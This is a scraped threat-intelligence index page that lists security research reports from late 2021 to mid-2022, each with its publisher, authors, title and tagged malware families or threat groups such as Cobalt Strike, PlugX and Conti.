QakBot
×Select Content2022-06-02
⋅
Mandiant
⋅
Mandiant IntelligenceTo HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions FAKEUPDATES
Blister
Cobalt Strike
DoppelPaymer
Dridex
FriedEx
Hades
LockBit
Macaw
MimiKatz
Phoenix Locker
WastedLocker
×Select Content2022-06-01
⋅
Elastic
⋅
Andrew Pease,
Daniel Stepanic,
Derek Ditch,
Salim Bitam,
Seth GoodwinCUBA Ransomware Campaign Analysis Cobalt Strike
Cuba
Meterpreter
MimiKatz
SystemBC
×Select Content2022-05-27
⋅
⋅
PTSecurity
⋅
Aleksey Vishnyakov,
Anton BelousovHow bootkits are implemented in modern firmware and how UEFI differs from Legacy BIOS LoJax
MoonBounce
×Select Content2022-05-25
⋅
Medium walmartglobaltech
⋅
Jason Reaves,
Joshua PlattSocGholish Campaigns and Initial Access Kit FAKEUPDATES
Blister
Cobalt Strike
NetSupportManager RAT
×Select Content2022-05-24
⋅
BitSight
⋅
BitSight,
João Batista,
Pedro UmbelinoEmotet Botnet Rises Again Cobalt Strike
Emotet
QakBot
SystemBC
×Select Content2022-05-24
⋅
The Hacker News
⋅
Florian GoutinMalware Analysis: Trickbot Cobalt Strike
Conti
Ryuk
TrickBot
×Select Content2022-05-23
⋅
Trend Micro
⋅
Daniel Lunghi,
Jaromír HořejšíOperation Earth Berberoka reptile
oRAT
Ghost RAT
PlugX
pupy
Earth Berberoka
×Select Content2022-05-22
⋅
R136a1
⋅
Dominik ReichelIntroduction of a PE file extractor for various situations Cobalt Strike
Matanbuchus
×Select Content2022-05-20
⋅
sonatype
⋅
Ax SharmaNew 'pymafka' malicious package drops Cobalt Strike on macOS, Windows, Linux Cobalt Strike
×Select Content2022-05-20
⋅
VinCSS
⋅
Dang Dinh Phuong,
m4n0w4r,
Tran Trung Kien[RE027] China-based APT Mustang Panda might have still continued their attack activities against organizations in Vietnam PlugX
×Select Content2022-05-20
⋅
Cybleinc
⋅
CybleMalware Campaign Targets InfoSec Community: Threat Actor Uses Fake Proof Of Concept To Deliver Cobalt-Strike Beacon Cobalt Strike
×Select Content2022-05-20
⋅
AhnLab
⋅
ASECWhy Remediation Alone Is Not Enough When Infected by Malware Cobalt Strike
DarkSide
×Select Content2022-05-19
⋅
InfoSec Handlers Diary Blog
⋅
Brad DuncanBumblebee Malware from TransferXL URLs BumbleBee
Cobalt Strike
×Select Content2022-05-19
⋅
InfoSec Handlers Diary Blog
⋅
Brad DuncanBumblebee Malware from TransferXL URLs BumbleBee
Cobalt Strike
×Select Content2022-05-18
⋅
PRODAFT Threat Intelligence
⋅
PRODAFTWizard Spider In-Depth Analysis Cobalt Strike
Conti
WIZARD SPIDER
×Select Content2022-05-17
⋅
Trend Micro
⋅
Trend Micro ResearchRansomware Spotlight: RansomEXX LaZagne
Cobalt Strike
IcedID
MimiKatz
PyXie
RansomEXX
TrickBot
×Select Content2022-05-17
⋅
Positive Technologies
⋅
Positive TechnologiesSpace Pirates: analyzing the tools and connections of a new hacker group FormerFirstRAT
PlugX
Poison Ivy
Rovnix
ShadowPad
Zupdax
×Select Content2022-05-16
⋅
JPCERT/CC
⋅
Shusei TomonagaAnalysis of HUI Loader HUI Loader
PlugX
Poison Ivy
Quasar RAT
×Select Content2022-05-12
⋅
Intel 471
⋅
Intel 471What malware to look for if you want to prevent a ransomware attack Conti
BumbleBee
Cobalt Strike
IcedID
Sliver
×Select Content2022-05-12
⋅
Red Canary
⋅
Lauren Podber,
Tony LambertThe Goot cause: Detecting Gootloader and its follow-on activity GootLoader
Cobalt Strike
×Select Content2022-05-12
⋅
Red Canary
⋅
Lauren Podber,
Tony LambertGootloader and Cobalt Strike malware analysis GootLoader
Cobalt Strike
×Select Content2022-05-12
⋅
TEAMT5
⋅
Leon Chang,
Silvia YehThe Next Gen PlugX/ShadowPad? A Dive into the Emerging China-Nexus Modular Trojan, Pangolin8RAT (slides) KEYPLUG
Cobalt Strike
CROSSWALK
FunnySwitch
PlugX
ShadowPad
Winnti
SLIME29
TianWu
×Select Content2022-05-11
⋅
InfoSec Handlers Diary Blog
⋅
Brad DuncanTA578 using thread-hijacked emails to push ISO files for Bumblebee malware BumbleBee
Cobalt Strike
IcedID
PhotoLoader
×Select Content2022-05-11
⋅
⋅
NTT
⋅
Ryu HiyoshiOperation RestyLink: Targeted attack campaign targeting Japanese companies Cobalt Strike
×Select Content2022-05-10
⋅
Marco Ramilli's Blog
⋅
Marco RamilliA Malware Analysis in RU-AU conflict Cobalt Strike
×Select Content2022-05-09
⋅
Microsoft
⋅
Microsoft 365 Defender Threat Intelligence Team,
Microsoft Threat Intelligence Center (MSTIC)Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself AnchorDNS
BlackCat
BlackMatter
Conti
DarkSide
HelloKitty
Hive
LockBit
REvil
FAKEUPDATES
Griffon
ATOMSILO
BazarBackdoor
BlackCat
BlackMatter
Blister
Cobalt Strike
Conti
DarkSide
Emotet
FiveHands
Gozi
HelloKitty
Hive
IcedID
ISFB
JSSLoader
LockBit
LockFile
Maze
NightSky
Pandora
Phobos
Phoenix Locker
PhotoLoader
QakBot
REvil
Rook
Ryuk
SystemBC
TrickBot
WastedLocker
BRONZE STARLIGHT
×Select Content2022-05-09
⋅
cocomelonc
⋅
cocomeloncMalware development: persistence - part 4. Windows services. Simple C++ example. Anchor
AppleJeus
Attor
BBSRAT
BlackEnergy
Carbanak
Cobalt Strike
DuQu
×Select Content2022-05-09
⋅
⋅
Qianxin Threat Intelligence Center
⋅
Red Raindrops TeamOperation EviLoong: An electronic party of "borderless" hackers ZXShell
×Select Content2022-05-09
⋅
TEAMT5
⋅
TeamT5Hiding in Plain Sight: Obscuring C2s by Abusing CDN Services Cobalt Strike
×Select Content2022-05-09
⋅
The DFIR Report
⋅
The DFIR ReportSEO Poisoning – A Gootloader Story GootLoader
LaZagne
Cobalt Strike
GootKit
×Select Content2022-05-08
⋅
IronNet
⋅
Brent Eskridge,
Joey Fitzpatrick,
Michael LeardiTracking Cobalt Strike Servers Used in Cyberattacks on Ukraine Cobalt Strike
×Select Content2022-05-06
⋅
Twitter (@MsftSecIntel)
⋅
Microsoft Security IntelligenceTwitter Thread on initial infeciton of SocGholish/ FAKEUPDATES campaigns lead to BLISTER Loader, CobaltStrike, Lockbit and followed by Hands On Keyboard activity FAKEUPDATES
Blister
Cobalt Strike
LockBit
×Select Content2022-05-06
⋅
Palo Alto Networks Unit 42
⋅
Chris Navarrete,
Durgesh Sangvikar,
Siddhart Shibiraj,
Yanhui Jia,
Yu FuCobalt Strike Analysis and Tutorial: CS Metadata Encoding and Decoding Cobalt Strike
×Select Content2022-05-06
⋅
The Hacker News
⋅
Ravie LakshmananThis New Fileless Malware Hides Shellcode in Windows Event Logs Cobalt Strike
×Select Content2022-05-05
⋅
Cisco Talos
⋅
Aliza Berk,
Asheer Malhotra,
Jung soo An,
Justin Thattil,
Kendall McKayMustang Panda deploys a new wave of malware targeting Europe Cobalt Strike
Meterpreter
PlugX
Unidentified 094
×Select Content2022-05-04
⋅
Kaspersky
⋅
Denis LegezoA new secret stash for “fileless” malware Cobalt Strike
×Select Content2022-05-04
⋅
Twitter (@felixw3000)
⋅
FelixTwitter Thread with info on infection chain with IcedId, Cobalt Strike, and Hidden VNC. Cobalt Strike
IcedID
PhotoLoader
×Select Content2022-05-03
⋅
Recorded Future
⋅
Insikt Group®SOLARDEFLECTION C2 Infrastructure Used by NOBELIUM in Company Brand Misuse Cobalt Strike
EnvyScout
×Select Content2022-05-03
⋅
Cluster25
⋅
Cluster25The Strange Link Between A Destructive Malware And A Ransomware-Gang Linked Custom Loader: IsaacWiper Vs Vatet Cobalt Strike
IsaacWiper
PyXie
×Select Content2022-05-03
⋅
Recorded Future
⋅
Insikt GroupSOLARDEFLECTION C2 Infrastructure Used by NOBELIUM in Company Brand Misuse Cobalt Strike
×Select Content2022-05-02
⋅
Sentinel LABS
⋅
Amitai Ben Shushan Ehrlich,
Joey ChenMoshen Dragon’s Triad-and-Error Approach | Abusing Security Software to Sideload PlugX and ShadowPad PlugX
ShadowPad
Moshen Dragon
×Select Content2022-05-02
⋅
Cisco Talos
⋅
JAIME FILSON,
Kendall McKay,
Paul EubanksConti and Hive ransomware operations: Leveraging victim chats for insights Cobalt Strike
Conti
Hive
×Select Content2022-05-02
⋅
⋅
Macnica
⋅
Hiroshi TakeuchiAttack Campaigns that Exploit Shortcuts and ISO Files Cobalt Strike
×Select Content2022-04-28
⋅
PWC
⋅
PWC UKCyber Threats 2021: A Year in Retrospect BPFDoor
APT15
APT31
APT41
APT9
BlackTech
BRONZE EDGEWOOD
DAGGER PANDA
Earth Lusca
HAFNIUM
HAZY TIGER
Inception Framework
LOTUS PANDA
QUILTED TIGER
RedAlpha
Red Dev 17
Red Menshen
Red Nue
VICEROY TIGER
×Select Content2022-04-28
⋅
PWC
⋅
PWC UKCyber Threats 2021: A Year in Retrospect (Annex) Cobalt Strike
Conti
PlugX
RokRAT
Inception Framework
Red Menshen
×Select Content2022-04-28
⋅
DARKReading
⋅
Jai VijayanChinese APT Bronze President Mounts Spy Campaign on Russian Military PlugX
MUSTANG PANDA
×Select Content2022-04-28
⋅
Mandiant
⋅
Anders Vejlby,
John Wolfram,
Nick Simonian,
Sarah Hawley,
Tyler McLellanTrello From the Other Side: Tracking APT29 Phishing Campaigns Cobalt Strike
×Select Content2022-04-27
⋅
Trendmicro
⋅
TrendmicroIOCs for Earth Berberoka - Windows AsyncRAT
Cobalt Strike
PlugX
Quasar RAT
Earth Berberoka
×Select Content2022-04-27
⋅
Secureworks
⋅
Counter Threat Unit ResearchTeamBRONZE PRESIDENT Targets Russian Speakers with Updated PlugX PlugX
×Select Content2022-04-27
⋅
⋅
ANSSI
⋅
ANSSILE GROUPE CYBERCRIMINEL FIN7 Bateleur
BELLHOP
Griffon
SQLRat
POWERSOURCE
Andromeda
BABYMETAL
BlackCat
BlackMatter
BOOSTWRITE
Carbanak
Cobalt Strike
DNSMessenger
Dridex
DRIFTPIN
Gameover P2P
MimiKatz
Murofet
Qadars
Ranbyus
SocksBot
×Select Content2022-04-27
⋅
Trend Micro
⋅
Daniel Lunghi,
Jaromír HořejšíNew APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware HelloBot
AsyncRAT
Ghost RAT
HelloBot
PlugX
Quasar RAT
Earth Berberoka
×Select Content2022-04-27
⋅
Mandiant
⋅
MandiantAssembling the Russian Nesting Doll: UNC2452 Merged into APT29 Cobalt Strike
Raindrop
SUNBURST
TEARDROP
×Select Content2022-04-27
⋅
Trendmicro
⋅
Daniel Lunghi,
Jaromír HořejšíOperation Gambling Puppet reptile
oRAT
AsyncRAT
Cobalt Strike
DCRat
Ghost RAT
PlugX
Quasar RAT
Trochilus RAT
Earth Berberoka
×Select Content2022-04-27
⋅
Sentinel LABS
⋅
James Haughom,
Jim Walter,
Júlio DantasLockBit Ransomware Side-loads Cobalt Strike Beacon with Legitimate VMware Utility Cobalt Strike
LockBit
×Select Content2022-04-27
⋅
Sentinel LABS
⋅
James Haughom,
Jim Walter,
Júlio DantasLockBit Ransomware Side-loads Cobalt Strike Beacon with Legitimate VMware Utility Cobalt Strike
LockBit
BRONZE STARLIGHT
×Select Content2022-04-26
⋅
Trend Micro
⋅
Lord Alfred Remorin,
Ryan Flores,
Stephen HiltHow Cybercriminals Abuse Cloud Tunneling Services AsyncRAT
Cobalt Strike
DarkComet
Meterpreter
Nanocore RAT
×Select Content2022-04-26
⋅
Intel 471
⋅
Intel 471Conti and Emotet: A constantly destructive duo Cobalt Strike
Conti
Emotet
IcedID
QakBot
TrickBot
×Select Content2022-04-25
⋅
The DFIR Report
⋅
The DFIR ReportQuantum Ransomware Cobalt Strike
IcedID
×Select Content2022-04-25
⋅
Morphisec
⋅
Morphisec LabsNew Core Impact Backdoor Delivered Via VMware Vulnerability Cobalt Strike
JSSLoader
×Select Content2022-04-21
⋅
ZeroSec
⋅
Andy GillUnderstanding Cobalt Strike Profiles - Updated For Cobalt Strike 4.6 Cobalt Strike
×Select Content2022-04-19
⋅
Blake's R&D
⋅
bmcder02Extracting Cobalt Strike from Windows Error Reporting Cobalt Strike
×Select Content2022-04-19
⋅
Varonis
⋅
Nadav OvadiaHive Ransomware Analysis Cobalt Strike
Hive
MimiKatz
×Select Content2022-04-18
⋅
AdvIntel
⋅
Vitali Kremez,
Yelisey BoguslavskiyEnter KaraKurt: Data Extortion Arm of Prolific Ransomware Group AvosLocker
BazarBackdoor
BlackByte
BlackCat
Cobalt Strike
HelloKitty
Hive
Karakurt
×Select Content2022-04-18
⋅
SentinelOne
⋅
James HaughomFrom the Front Lines | Peering into A PYSA Ransomware Attack Chisel
Chisel
Cobalt Strike
Mespinoza
×Select Content2022-04-18
⋅
vanmieghem
⋅
Vincent Van MieghemA blueprint for evading industry leading endpoint protection in 2022 Cobalt Strike
×Select Content2022-04-14
⋅
NSHC RedAlert Labs
⋅
NSHC Threatrecon TeamHacking activity of SectorB Group in 2021 Chinese government supported hacking group SectorB PlugX
×Select Content2022-04-14
⋅
Cynet
⋅
Max MalyutinOrion Threat Alert: Flight of the BumbleBee BumbleBee
Cobalt Strike
×Select Content2022-04-13
⋅
ESET Research
⋅
Jean-Ian Boutin,
Tomáš ProcházkaESET takes part in global operation to disrupt Zloader botnets Cobalt Strike
Zloader
×Select Content2022-04-13
⋅
Microsoft
⋅
Microsoft 365 Defender Threat Intelligence TeamDismantling ZLoader: How malicious ads led to disabled security tools and ransomware BlackMatter
Cobalt Strike
DarkSide
Ryuk
Zloader
×Select Content2022-04-12
⋅
Max Kersten's Blog
⋅
Max KerstenGhidra script to handle stack strings CaddyWiper
PlugX
×Select Content2022-04-08
⋅
The Register
⋅
Laura DobbersteinChina accused of cyberattacks on Indian power grid ShadowPad
×Select Content2022-04-08
⋅
Infinitum Labs
⋅
Arda BüyükkayaThreat Spotlight: Conti Ransomware Group Behind the Karakurt Hacking Team Cobalt Strike
MimiKatz
×Select Content2022-04-07
⋅
splunk
⋅
Splunk Threat Research TeamYou Bet Your Lsass: Hunting LSASS Access Cobalt Strike
MimiKatz
×Select Content2022-04-07
⋅
InQuest
⋅
Nick Chalard,
Will MacArthurUkraine CyberWar Overview CyclopsBlink
Cobalt Strike
GraphSteel
GrimPlant
HermeticWiper
HermeticWizard
MicroBackdoor
PartyTicket
Saint Bot
Scieron
WhisperGate
×Select Content2022-04-06
⋅
Github (infinitumlabs)
⋅
Arda BüyükkayaKarakurt Hacking Team Indicators of Compromise (IOC) Cobalt Strike
×Select Content2022-04-06
⋅
Recorded Future
⋅
Insikt GroupContinued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group ShadowPad
×Select Content2022-04-06
⋅
Recorded Future
⋅
Insikt Group®Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group (TAG-38) ShadowPad
×Select Content2022-04-04
⋅
Mandiant
⋅
Brendan McKeague,
Bryce Abdo,
Ioana Teaca,
Zander WorkFIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7 Griffon
BABYMETAL
Carbanak
Cobalt Strike
JSSLoader
Termite
×Select Content2022-03-31
⋅
nccgroup
⋅
Alex Jessop,
Nikolaos Pantazopoulos,
RIFT: Research and Intelligence Fusion Team,
Simon BiggsConti-nuation: methods and techniques observed in operations post the leaks Cobalt Strike
Conti
QakBot
×Select Content2022-03-31
⋅
SC Media
⋅
SC StaffNovel obfuscation leveraged by Hive ransomware Cobalt Strike
Hive
×Select Content2022-03-30
⋅
Bleeping Computer
⋅
Bill ToulasPhishing campaign targets Russian govt dissidents with Cobalt Strike Unidentified PS 002 (RAT)
Cobalt Strike
×Select Content2022-03-30
⋅
Prevailion
⋅
PrevailionWizard Spider continues to confound BazarBackdoor
Cobalt Strike
Emotet
×Select Content2022-03-29
⋅
Malwarebytes Labs
⋅
Hossein JaziNew spear phishing campaign targets Russian dissidents Unidentified PS 002 (RAT)
Cobalt Strike
×Select Content2022-03-29
⋅
SentinelOne
⋅
Antonis Terefos,
James Haughom,
Jeff Cavanaugh,
Jim Walter,
Nick Fox,
Shai TiliasFrom the Front Lines | Hive Ransomware Deploys Novel IPfuscation Technique To Avoid Detection Cobalt Strike
Hive
×Select Content2022-03-28
⋅
Mandiant
⋅
Brandon Wilbur,
Dallin Warne,
Geoff Ackerman,
James Maclachlan,
John Wolfram,
Tufail AhmedForged in Fire: A Survey of MobileIron Log4Shell Exploitation KEYPLUG
×Select Content2022-03-28
⋅
Trellix
⋅
Marc Elias,
Max KerstenPlugX: A Talisman to Behold PlugX
×Select Content2022-03-28
⋅
Medium walmartglobaltech
⋅
Jason ReavesCobaltStrike UUID stager Cobalt Strike
×Select Content2022-03-25
⋅
nccgroup
⋅
Yun Zheng HuMining data from Cobalt Strike beacons Cobalt Strike
×Select Content2022-03-25
⋅
⋅
ESET Research
⋅
Alexandre Côté CyrMustang Panda's Hodur: Old stuff, new variant of Korplug PlugX
×Select Content2022-03-25
⋅
GOV.UA
⋅
State Service of Special Communication and Information Protection of Ukraine (CIP)Who is behind the Cyberattacks on Ukraine's Critical Information Infrastructure: Statistics for March 15-22 Xloader
Agent Tesla
CaddyWiper
Cobalt Strike
DoubleZero
GraphSteel
GrimPlant
HeaderTip
HermeticWiper
IsaacWiper
MicroBackdoor
Pandora RAT
×Select Content2022-03-24
⋅
Threat Post
⋅
Nate NelsonChinese APT Combines Fresh Hodur RAT with Complex Anti-Detection PlugX
×Select Content2022-03-23
⋅
BleepingComputer
⋅
Bill ToulasNew Mustang Panda hacking campaign targets diplomats, ISPs PlugX
×Select Content2022-03-23
⋅
ESET Research
⋅
Alexandre Côté CyrMustang Panda’s Hodur: Old tricks, new Korplug variant PlugX
×Select Content2022-03-22
⋅
Red Canary
⋅
Red Canary2022 Threat Detection Report FAKEUPDATES
Silver Sparrow
BazarBackdoor
Cobalt Strike
GootKit
Yellow Cockatoo RAT
×Select Content2022-03-22
⋅
NVISO Labs
⋅
Didier StevensCobalt Strike: Overview – Part 7 Cobalt Strike
×Select Content2022-03-21
⋅
Threat Post
⋅
Lisa VaasConti Ransomware V. 3, Including Decryptor, Leaked Cobalt Strike
Conti
TrickBot
×Select Content2022-03-21
⋅
eSentire
⋅
eSentire Threat Response Unit (TRU)Conti Affiliate Exposed: New Domain Names, IP Addresses and Email Addresses Uncovered HelloKitty
BazarBackdoor
Cobalt Strike
Conti
FiveHands
HelloKitty
IcedID
×Select Content2022-03-17
⋅
⋅
Benoit Sevens,
Google Threat Analysis Group,
Vladislav StolyarovExposing initial access broker with ties to Conti BazarBackdoor
BumbleBee
Cobalt Strike
Conti
×Select Content2022-03-16
⋅
paloalto Netoworks: Unit42
⋅
Andrew Guan,
Chris Navarrete,
Durgesh Sangvikar,
Siddhart Shibiraj,
Yanhui Jia,
Yu FuCobalt Strike Analysis and Tutorial: How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect Cobalt Strike
×Select Content2022-03-16
⋅
SANS ISC
⋅
Brad DuncanQakbot infection with Cobalt Strike and VNC activity Cobalt Strike
QakBot
×Select Content2022-03-16
⋅
InfoSec Handlers Diary Blog
⋅
Brad DuncanQakbot infection with Cobalt Strike and VNC activity Cobalt Strike
QakBot
×Select Content2022-03-15
⋅
Prevailion
⋅
Matt Stafford,
Sherman SmithWhat Wicked Webs We Un-weave Cobalt Strike
Conti
×Select Content2022-03-15
⋅
SentinelOne
⋅
Amitai Ben Shushan EhrlichThreat Actor UAC-0056 Targeting Ukraine with Fake Translation Software Cobalt Strike
GraphSteel
GrimPlant
SaintBear
×Select Content2022-03-14
⋅
Bleeping Computer
⋅
Bill ToulasFake antivirus updates used to deploy Cobalt Strike in Ukraine Cobalt Strike
×Select Content2022-03-13
⋅
Mandiant
⋅
MandiantAPT41 (Double Dragon): A Dual Espionage and Cyber Crime Operation APT41
×Select Content2022-03-12
⋅
Arash's Blog
⋅
Arash ParsaAnalyzing Malware with Hooks, Stomps, and Return-addresses Cobalt Strike
×Select Content2022-03-11
⋅
⋅
Cert-UACyberattack on Ukrainian state authorities using the Cobalt Strike Beacon (CERT-UA#4145) Cobalt Strike
×Select Content2022-03-09
⋅
Bleeping Computer
⋅
Ionut IlascuCISA updates Conti ransomware alert with nearly 100 domain names BazarBackdoor
Cobalt Strike
Conti
TrickBot
×Select Content2022-03-09
⋅
BreachQuest
⋅
Bernard Silvestrini,
Marco Figueroa,
Napoleon BingThe Conti Leaks | Insight into a Ransomware Unicorn Cobalt Strike
MimiKatz
TrickBot
×Select Content2022-03-08
⋅
Twitter (@CyberJack42)
⋅
CyberJackTweet on ELFSHELF alias for KEYPLUG KEYPLUG
×Select Content2022-03-08
⋅
Mandiant
⋅
Douglas Bienstock,
Geoff Ackerman,
John Wolfram,
Rufus Brown,
Van TaDoes This Look Infected? A Summary of APT41 Targeting U.S. State Governments KEYPLUG
Cobalt Strike
LOWKEY
×Select Content2022-03-07
⋅
Proofpoint
⋅
Michael Raggi,
Myrtus 0x0The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates PlugX
MUSTANG PANDA
×Select Content2022-03-07
⋅
The DFIR Report
⋅
The DFIR Report2021 Year In Review Cobalt Strike
×Select Content2022-03-04
⋅
Telsy
⋅
TelsyLegitimate Sites Used As Cobalt Strike C2s Against Indian Government Cobalt Strike
×Select Content2022-03-03
⋅
Trend Micro
⋅
Trend Micro ResearchCyberattacks are Prominent in the Russia-Ukraine Conflict BazarBackdoor
Cobalt Strike
Conti
Emotet
WhisperGate
×Select Content2022-03-01
⋅
VirusTotal
⋅
VirusTotalVirusTotal's 2021 Malware Trends Report Anubis
AsyncRAT
BlackMatter
Cobalt Strike
DanaBot
Dridex
Khonsari
MimiKatz
Mirai
Nanocore RAT
Orcus RAT
×Select Content2022-02-26
⋅
Mandiant
⋅
MandiantTRENDING EVIL Q1 2022 KEYPLUG
FAKEUPDATES
GootLoader
BazarBackdoor
QakBot
×Select Content2022-02-24
⋅
Cynet
⋅
Max MalyutinNew Wave of Emotet – When Project X Turns Into Y Cobalt Strike
Emotet
×Select Content2022-02-24
⋅
Fortinet
⋅
Fred GutierrezNobelium Returns to the Political World Stage Cobalt Strike
×Select Content2022-02-23
⋅
cyber.wtf blog
⋅
Luca EbachWhat the Pack(er)? Cobalt Strike
Emotet
×Select Content2022-02-23
⋅
Dragos
⋅
Dragos2021 ICS OT Cybersecurity Year In Review ShadowPad
×Select Content2022-02-23
⋅
AdvIntel
⋅
Vitali Kremez,
Yelisey Boguslavskiy24 Hours From Log4Shell to Local Admin: Deep-Dive Into Conti Gang Attack on Fortune 500 (DFIR) Cobalt Strike
Conti
×Select Content2022-02-23
⋅
SophosLabs Uncut
⋅
Andrew BrandtDridex bots deliver Entropy ransomware in recent attacks Cobalt Strike
Dridex
Entropy
×Select Content2022-02-22
⋅
eSentire
⋅
eSentire Threat Response Unit (TRU)IcedID to Cobalt Strike In Under 20 Minutes Cobalt Strike
IcedID
PhotoLoader
×Select Content2022-02-22
⋅
Bleeping Computer
⋅
Bill ToulasVulnerable Microsoft SQL Servers targeted with Cobalt Strike Cobalt Strike
Kingminer
Lemon Duck
×Select Content2022-02-21
⋅
ASECCobalt Strike Being Distributed to Vulnerable MS-SQL Servers Cobalt Strike
Lemon Duck
×Select Content2022-02-21
⋅
The DFIR ReportQbot and Zerologon Lead To Full Domain Compromise Cobalt Strike
QakBot
×Select Content2022-02-20
⋅
Medium SOCFortress
⋅
SOCFortressDetecting Cobalt Strike Beacons Cobalt Strike
×Select Content2022-02-18
⋅
Huntress Labs
⋅
Matthew BrennanHackers No Hashing: Randomizing API Hashes to Evade Cobalt Strike Shellcode Detection Cobalt Strike
×Select Content2022-02-17
⋅
SinaCyber
⋅
Adam KozyTestimony before the U.S.-China Economic and Security Review Commission Hearing on “China’s Cyber Capabilities: Warfare, Espionage, and Implications for the United States” PlugX
APT26
APT41
×Select Content2022-02-16
⋅
Security Onion
⋅
Doug BurksQuick Malware Analysis: Emotet Epoch 5 and Cobalt Strike pcap from 2022-02-08 Cobalt Strike
Emotet
×Select Content2022-02-15
⋅
The Hacker News
⋅
Ravie LakshmananResearchers Link ShadowPad Malware Attacks to Chinese Ministry and PLA ShadowPad
×Select Content2022-02-15
⋅
eSentire
⋅
eSentire Threat Response Unit (TRU)Increase in Emotet Activity and Cobalt Strike Deployment Cobalt Strike
Emotet
×Select Content2022-02-15
⋅
Secureworks
⋅
Counter Threat Unit ResearchTeamShadowPad Malware Analysis ShadowPad
×Select Content2022-02-10
⋅
Cybereason
⋅
Cybereason Global SOC TeamThreat Analysis Report: All Paths Lead to Cobalt Strike - IcedID, Emotet and QBot Cobalt Strike
Emotet
IcedID
QakBot
×Select Content2022-02-09
⋅
vmware
⋅
VMWareExposing Malware in Linux-Based Multi-Cloud Environments ACBackdoor
BlackMatter
DarkSide
Erebus
HelloKitty
Kinsing
PLEAD
QNAPCrypt
RansomEXX
REvil
Sysrv-hello
TeamTNT
Vermilion Strike
Cobalt Strike
×Select Content2022-01-31
⋅
CyberArk
⋅
Arash ParsaAnalyzing Malware with Hooks, Stomps and Return-addresses Cobalt Strike
×Select Content2022-01-28
⋅
Morphisec
⋅
Morphisec LabsLog4j Exploit Hits Again: Vulnerable Unifi Network Application (Ubiquiti) at Risk Cobalt Strike
×Select Content2022-01-27
⋅
JSAC 2021
⋅
Hajime Yanagishita,
Kiyotaka Tamada,
Suguru Ishimaru,
You NakatsuruWhat We Can Do against the Chaotic A41APT Campaign CHINACHOPPER
Cobalt Strike
HUI Loader
SodaMaster
×Select Content2022-01-26
⋅
Blackberry
⋅
Codi Starks,
Ryan Gibson,
Will IkardLog4U, Shell4Me Cobalt Strike
×Select Content2022-01-25
⋅
Cynet
⋅
Orion Threat Research and Intelligence TeamThreats Looming Over the Horizon Cobalt Strike
Meterpreter
NightSky
×Select Content2022-01-24
⋅
The DFIR Report
⋅
The DFIR ReportCobalt Strike, a Defender’s Guide – Part 2 Cobalt Strike
×Select Content2022-01-21
⋅
binarly
⋅
Binarly TeamA deeper UEFI dive into MoonBounce MoonBounce
×Select Content2022-01-20
⋅
Morphisec
⋅
Michael GorelikLog4j Exploit Hits Again: Vulnerable VMWare Horizon Servers at Risk Cobalt Strike
×Select Content2022-01-20
⋅
Kaspersky
⋅
Denis Legezo,
Ilya Borisov,
Mark Lechtik,
Vasily BerdnikovMoonBounce: the dark side of UEFI firmware MoonBounce
×Select Content2022-01-20
⋅
Kaspersky Labs
⋅
Denis Legezo,
Ilya Borisov,
Mark Lechtik,
Vasily BerdnikovTechnical details of MoonBounce’s implementation MoonBounce
×Select Content2022-01-19
⋅
Elastic
⋅
Andrew Pease,
Daniel Stepanic,
Derek Ditch,
Seth GoodwinExtracting Cobalt Strike Beacon Configurations Cobalt Strike
×Select Content2022-01-19
⋅
Blackberry
⋅
The BlackBerry Research & Intelligence TeamKraken the Code on Prometheus Prometheus Backdoor
BlackMatter
Cerber
Cobalt Strike
DCRat
Ficker Stealer
QakBot
REvil
Ryuk
×Select Content2022-01-19
⋅
Elastic
⋅
Andrew Pease,
Daniel Stepanic,
Derek Ditch,
Seth GoodwinCollecting Cobalt Strike Beacons with the Elastic Stack Cobalt Strike
×Select Content2022-01-19
⋅
Sophos
⋅
Colin Cowie,
Mat Gangwer,
Sophos MTR Team,
Stan AndicZloader Installs Remote Access Backdoors and Delivers Cobalt Strike Cobalt Strike
Zloader
×Select Content2022-01-18
⋅
Recorded Future
⋅
Insikt Group®2021 Adversary Infrastructure Report BazarBackdoor
Cobalt Strike
Dridex
IcedID
QakBot
TrickBot
×Select Content2022-01-17
⋅
Trend Micro
⋅
Cedric Pernet,
Daniel Lunghi,
Gloria Chen,
Jaromír Hořejší,
Joseph Chen,
Kenney LuDelving Deep: An Analysis of Earth Lusca’s Operations BIOPASS
Cobalt Strike
FunnySwitch
JuicyPotato
ShadowPad
Winnti
Earth Lusca
×Select Content2022-01-16
⋅
forensicitguy
⋅
Tony LambertAnalyzing a CACTUSTORCH HTA Leading to Cobalt Strike CACTUSTORCH
Cobalt Strike
×Select Content2022-01-15
⋅
Huntress Labs
⋅
Team HuntressThreat Advisory: VMware Horizon Servers Actively Being Hit With Cobalt Strike (by DEV-0401) Cobalt Strike
×Select Content2022-01-11
⋅
Medium walmartglobaltech
⋅
Jason Reaves,
Joshua PlattSigned DLL campaigns as a service BATLOADER
Cobalt Strike
ISFB
Zloader
×Select Content2022-01-11
⋅
Twitter (@cglyer)
⋅
Christopher GlyerThread on DEV-0401, a china based ransomware operator exploiting VMware Horizon with log4shell and deploying NightSky ransomware Cobalt Strike
NightSky
×Select Content2022-01-11
⋅
Cybereason
⋅
Chen Erlich,
Daichi Shimabukuro,
Niv Yona,
Ofir Ozer,
Omri RefaeliThreat Analysis Report: DatopLoader Exploits ProxyShell to Deliver QBOT and Cobalt Strike Cobalt Strike
QakBot
Squirrelwaffle
×Select Content2022-01-09
⋅
forensicitguy
⋅
Tony LambertInspecting a PowerShell Cobalt Strike Beacon Cobalt Strike
×Select Content2022-01-06
⋅
Cyber And Ramen blog
⋅
Mike RA “GULP” of PlugX PlugX
×Select Content2022-01-06
⋅
Sekoia
⋅
sekoiaNOBELIUM’s EnvyScout infection chain goes in the registry, targeting embassies Cobalt Strike
EnvyScout
×Select Content2022-01-01
⋅
Silent Push
⋅
Silent PushConsequences- The Conti Leaks and future problems Cobalt Strike
Conti
×Select Content2021-12-29
⋅
CrowdStrike
⋅
Benjamin Wiley,
Falcon OverWatch TeamOverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt Cobalt Strike
×Select Content2021-12-29
⋅
Blake's R&D
